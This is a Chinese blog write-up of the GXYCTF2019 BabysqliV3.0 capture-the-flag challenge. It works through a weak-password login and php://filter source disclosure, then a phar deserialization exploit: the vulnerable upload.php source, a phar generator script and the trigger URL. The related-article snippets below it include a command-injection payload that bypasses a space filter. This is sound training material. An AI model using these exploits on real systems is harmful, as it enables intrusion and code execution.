[GXYCTF2019]BabysqliV3.0

最新推荐文章于 2022-11-07 14:32:03 发布
最新推荐文章于 2022-11-07 14:32:03 发布
阅读量924 收藏 2
点赞数 1
分类专栏: # BUUCTF-Web 文章标签: php web安全 ctf 反序列化 弱口令
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/117030906
版权

[GXYCTF2019]BabysqliV3.0

考点

弱口令、PHP反序列化

思路

①:题目页面提示我们应该是需要sqli注入,但是用它输入框提示的admin/password一试就进去了…
②:http://5f8d9cd4-4695-4428-acc2-b02b0e49d8d9.node3.buuoj.cn/home.php?file=upload熟悉的形式,用php伪协议读取一下文件试试;
③:预期解法:审计 upload.php 代码,$this->Filename = $_GET['name'];,可见 $this->Filename 是可控的,可以通过 name 参数以 get 方式得到;分析最后上传部分的代码,file_get_contents() 使 $uploader 通过__toString() 返回 $this->Filename,$this->Filename 可控,因此此处 $this->Filename 用来触发 phar,__destruct() 方法内 eval($this->cmd);

Payload

伪协议读取home.php

<?php
session_start();
echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Home</title>";
error_reporting(0);
if(isset($_SESSION['user'])){
        if(isset($_GET['file'])){
                if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
                        die("hacker!");
                }
                else{
                        if(preg_match("/home$/i", $_GET['file']) or preg_match("/upload$/i", $_GET['file'])){
                                $file = $_GET['file'].".php";
                        }
                        else{
                                $file = $_GET['file'].".fxxkyou!";
                        }
                        echo "当前引用的是 ".$file;
                        require $file;
                }

        }
        else{
                die("no permission!");
        }
}
?>

伪协议读取upload.php

<?php
error_reporting(0);
class Uploader{
        public $Filename;
        public $cmd;
        public $token;


        function __construct(){
                $sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
                $ext = ".txt";
                @mkdir($sandbox, 0777, true);
                if(isset($_GET['name']) and !preg_match("/data:\/\/ | filter:\/\/ | php:\/\/ | \./i", $_GET['name'])){
                        $this->Filename = $_GET['name'];
                }
                else{
                        $this->Filename = $sandbox.$_SESSION['user'].$ext;
                }

                $this->cmd = "echo '<br><br>Master, I want to study rizhan!<br><br>';";
                $this->token = $_SESSION['user'];
        }

        function upload($file){
                global $sandbox;
                global $ext;

                if(preg_match("[^a-z0-9]", $this->Filename)){
                        $this->cmd = "die('illegal filename!');";
                }
                else{
                        if($file['size'] > 1024){
                                $this->cmd = "die('you are too big (′▽`〃)');";
                        }
                        else{
                                $this->cmd = "move_uploaded_file('".$file['tmp_name']."', '" . $this->Filename . "');";
                        }
                }
        }

        function __toString(){
                global $sandbox;
                global $ext;
                // return $sandbox.$this->Filename.$ext;
                return $this->Filename;
        }

        function __destruct(){
                if($this->token != $_SESSION['user']){
                        $this->cmd = "die('check token falied!');";
                }
                eval($this->cmd);
        }
}

if(isset($_FILES['file'])) {
        $uploader = new Uploader();
        $uploader->upload($_FILES["file"]);
        if(@file_get_contents($uploader)){
                echo "下面是你上传的文件:<br>".$uploader."<br>";
                echo file_get_contents($uploader);
        }
}

?>

预期解法

由于__destruct() 方法中,想要 eval($this->cmd); 的前提条件是 $this->token 和$_SESSION[‘user’] 相等

function __destruct(){
	if($this->token != $_SESSION['user']){
		$this->cmd = "die('check token falied!');";
	}
	eval($this->cmd);
}

在__construct() 方法中可见如下两行代码

$sandbox = getcwd()."/uploads/".md5($_SESSION['user'])."/";
$this->Filename = $sandbox.$_SESSION['user'].$ext;

因此可以先随便上传一个 txt,得到的路径中,.txt 前面的就是 $_SESSION[‘user’]

在这里插入图片描述

得到:GXY3fb034f8f0c46f14bf11438f9afccbf4,生成phar,并将生成的phar上传

<?php
class Uploader{
    public $Filename;
    public $cmd;
    public $token;
}

$upload = new Uploader();
$upload->cmd = "highlight_file('/var/www/html/flag.php');";
$upload->Filename = 'test';
$upload->token = 'GXY063c630ae7ab41c6fd121cb4851620a3';

$phar = new Phar("exp.phar");
$phar->startBuffering();
$phar->setStub('GIF89a'.'<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($upload); 
$phar->addFromString("exp.txt", "test");
$phar->stopBuffering();

得到路径/var/www/html/uploads/93cd61477a821014fa4b00df090ebdcd/GXY3fb034f8f0c46f14bf11438f9afccbf4.txt

在这里插入图片描述

然后将这个路径带上 phar:// 作为 name 参数的值,再随意上传一个文件,因为 $this->Filename 被我们手工指定为 phar,触发了 phar 反序列化导致命令执行
Payload:http://5f8d9cd4-4695-4428-acc2-b02b0e49d8d9.node3.buuoj.cn/home.php?file=upload&name=phar:///var/www/html/uploads/93cd61477a821014fa4b00df090ebdcd/GXY3fb034f8f0c46f14bf11438f9afccbf4.txt
传任意文件后,得到 flag

在这里插入图片描述

非预期解法

由于echo file_get_contents($uploader);上传后会显示出 $uploader 这个文件的内容,所以只要使 $this-Filename 为 flag.php 然后随便传个东西就会得到 flag 了

在这里插入图片描述

H3rmesk1t
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
[GXYCTF2019]BabysqliV3.0 [phar]
qq_40327508的博客
11-25 1460
打开题目是登录界面,使用burp爆破出密码是password 登录 上传文件,以及url里有拼接file参数,可能有文件包含漏洞 使用php伪协议获取upload源码 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype="multipart/form-data"> 上传文件 <input type="fil
CTF-WEB[GXYCTF 2019]BabyUpload
最新发布
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
GXYCTF2019&GWCTF2019——Writeup
Lethe's Blog
03-03 3268
GXYCTF Ping Ping Ping 进入题目后,提示了 /?ip=,于是加上参数 ?ip=1试试看,发现是执行了ping命令: 然后尝试: ?ip=;ls 发现成功执行了命令,但是当读取 flag.php 时,发现过了空格,尝试下面两种绕过方式 ${IFS} $IFS$9 使用第二个$IFS$9代替空格成功绕过,执行 ?ip=;cat$IFS$9flag.php,发现 flag...
[GXYCTF2019]BabysqliV3.0-phar反序列化正解
soldi_er的博客
06-08 503
文章目录phar反序列化漏洞利用条件构造payload文件漏洞利用参考收获   CSDN已经记录登录过程,弱口令登录,不再赘述。 phar反序列化漏洞利用条件   可以上传文件。可以执行命令的魔法函数。可以解析phar的函数,并且参数可控。   (1)upload.php可以上传文件。   (2)upload.php,具有执行命令的魔法函数。 class Uploader{ public $Filename; public $cmd; public $token; function __destr
[GXYCTF2019]BabysqliV3.0-phar反序列化
soldi_er的博客
05-19 1008
文章目录前期漏洞探测探测SQL注入探测文件上传探测文件包含漏洞反序列化利用-审计源码宽字节概念函数addslashes() 前期漏洞探测 探测SQL注入   登陆框。   面对登陆框时,可以使用admin测试盲注。或者使用pw测。   先fuzz一波,返回的都是"no this user",没有防火墙提醒。   存在admin用户。在name中测7种闭合方式,都返回"no this user"。 admin'%23、')、'")、'))。"、")、"))。   这才贴合实战,要是实战基本就放弃了。一看就知
BUUCTF刷题记录[GXYCTF2019]BabysqliV3.01——涉及phar反序列化pop链
u013119911的博客
06-30 1363
题目是Babysqli,具有一定误导性,会让做题者认为需要sql注入,实际上打开连接输入弱口令:即可进入 至此应该可以看出来是一个文件上传的题目,点击右键查看源代码,未发现有效信息, 在地址栏发现?file=upload,如果需要读取源码,从此处猜测应该是需要构造一个伪协议。从题目上来说,需要查看源码进行代码审计。 这里需要注意,查看upload.php源代码,后面的resource需要等于upload,不要加.php,程序会自动添加.php,......
C#做的超市管理系统。
11-17
《C#实现的超市管理系统详解》 在信息技术日益发达的今天,各类管理系统已经渗透到各行各业,其中超市管理系统作为零售业的重要组成部分,对于提升运营效率、优化库存管理具有重要作用。本系统采用C#编程语言和SQL ...
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
ctf-bbuctf-[GXYCTF2019]BabysqliV3.0具体思路复现
qq_42942226的博客
11-07 839
ctf-bbuctf-[GXYCTF2019]BabysqliV3.0具体思路复现
2017-2019蓝桥杯省赛题解.rar
03-23
2017-2019蓝桥杯省赛题解
[GXYCTF 2019]BabySqli
Aiwin的博客
08-10 1413
[GXYCTF 2019]BabySqli
BUUCTF--[GXYCTF2019]BabysqliV3.0
qq_46263951的博客
07-23 436
开始是一个登录页面,根据提示尝试万能密码,没啥用...这里尝试了几个弱口令就可以了 admin/password 使用伪协议读取文件内容?file=php://filter/read=convert.base64-encode/resource=upload <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <form action="" method="post" enctype..
[GXYCTF2019]BabysqliV3.0 phar反序列化
qq_54929891的博客
05-15 225
随便输入两个1 看来是要admin登录了,密码我起初以为通过万能密码可以绕过,结果没反应,最后试了一下top100爆破,出来了密码就是password 进入后看到url有一个file参数对应的是upload,页面提示我们现在是引用的upload.php文件,因此我们可以利用伪协议来读取源码了 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=u...
buuctf [GXYCTF2019]BabySQli
SopRomeo的博客
03-05 6009
常规sql注入都行不通,查看源码发现一个search.php, 先说说base32 和 base64 的区别, base32 只有大写字母和数字数字组成,或者后面有三个等号。 base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。 明显,那段文字是base32加密 解密后:c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW...
[GXYCTF2019]BabySQli
qq_43622442的博客
04-20 2933
[GXYCTF2019]BabySQli 1.打开网站,就一登录框: 2.随便弱口令登一下,放burp里面方便一些: 3.发现了一段字符串,看着这纯大写+数字,就猜是base32: 4.带两等号,应该就直接是base64了: 5.万能密码试一下(这里or被拦截,大小写绕过,等号被拦截可以<>或者like或者其他的函数绕过): 发现还是密码错误。这种题我做过,后端逻辑也就是...
[GXYCTF2019]BabySQli wp
freerats的博客
06-03 310
打开一登入框,尝试一下admin,admin 发现给出pass错误的响应,怀疑是存在admin账号的 尝试一下其他用户名,给出user错误,那么admin用户肯定存在 既然知道了存在admin用户,爆破一手弱口令肯定没肯定不会亏。(无法爆出来) 查看源代码,有一段base32,解码再解base64 select * from user where username = ‘$name’ 是一sql查询语句 接下来尝试注入,输入or的时候发现被过滤 登入框fuzz一下,发现or,(),=,被过滤。 大小写可以
BUUOJ-[GXYCTF2019]-WEB-WP
会下雪的晴天
09-13 964
平台地址:https://buuoj.cn/ 目录Ping Ping PingBabySQli禁止套娃 Ping Ping Ping 知识点:RCE,空格及过滤的一些基本绕过 提示GET ip,应该是RCE了,ls看看有啥 尝试cat一下,发现过滤了空格,绕过一下,过滤了flag,哈哈看来不是这么简单啊,读一下源码吧 空格绕过可以用这些字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS、$IFS$1 等 试了试好像只有$I.
[GXYCTF2019]BabySQli 1
10-06
[GXYCTF2019]BabySQli1 是一个联合查询构建虚拟数据的例子。该例子中使用了base32和base64进行数据模糊化处理。在第二个引用中,通过联合查询构建了一个查询语句,将用户名设置为'1'并且选择了一个管理员账号和密码...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值